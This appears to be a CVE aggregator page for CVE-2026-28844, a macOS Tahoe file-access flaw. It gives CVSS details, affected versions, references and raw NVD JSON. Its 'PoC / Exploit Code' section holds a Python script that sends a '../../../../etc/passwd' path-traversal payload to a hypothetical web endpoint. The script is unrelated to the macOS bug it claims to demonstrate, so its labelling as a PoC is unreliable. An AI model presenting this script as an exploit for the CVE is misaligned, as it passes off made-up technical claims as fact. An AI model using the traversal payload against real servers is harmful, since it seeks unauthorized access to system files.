CVE-2026-28844

Description

A file access issue was addressed with improved input validation. This issue is fixed in macOS Tahoe 26.4. An attacker may gain access to protected parts of the file system.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

macOS Tahoe < 26.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-28844: macOS File Access Vulnerability
# This is a conceptual demonstration of a path traversal attempt.

import requests

def check_vulnerability(target_url):
    # Hypothetical endpoint vulnerable to path traversal
    # Payload attempts to escape the web root to access /etc/passwd
    traversal_payload = '../../../../etc/passwd'
    
    params = {
        'file': traversal_payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=5)
        if 'root:' in response.text:
            print(f"[+] Potential vulnerability detected at {target_url}")
            print(f"[+] Response snippet: {response.text[:100]}")
        else:
            print("[-] Target does not appear to be vulnerable.")
    except Exception as e:
        print(f"[!] Error during request: {e}")

# Example usage (Replace with actual vulnerable endpoint if known)
# check_vulnerability("http://localhost:8080/vulnerable_endpoint")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28844
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28844
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28844/
[4] VulDB https://vuldb.com/cve/CVE-2026-28844
[5] https://support.apple.com/en-us/126794

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28844", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:09.180", "lastModified": "2026-03-25T18:29:51.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A file access issue was addressed with improved input validation. This issue is fixed in macOS Tahoe 26.4. An attacker may gain access to protected parts of the file system."}, {"lang": "es", "value": "Un problema de acceso a archivos se abordó con una validación de entrada mejorada. Este problema está solucionado en macOS Tahoe 26.4. Un atacante podría obtener acceso a partes protegidas del sistema de archivos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "DCFD15D9-91CA-4342-9F7E-A219B459B755"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}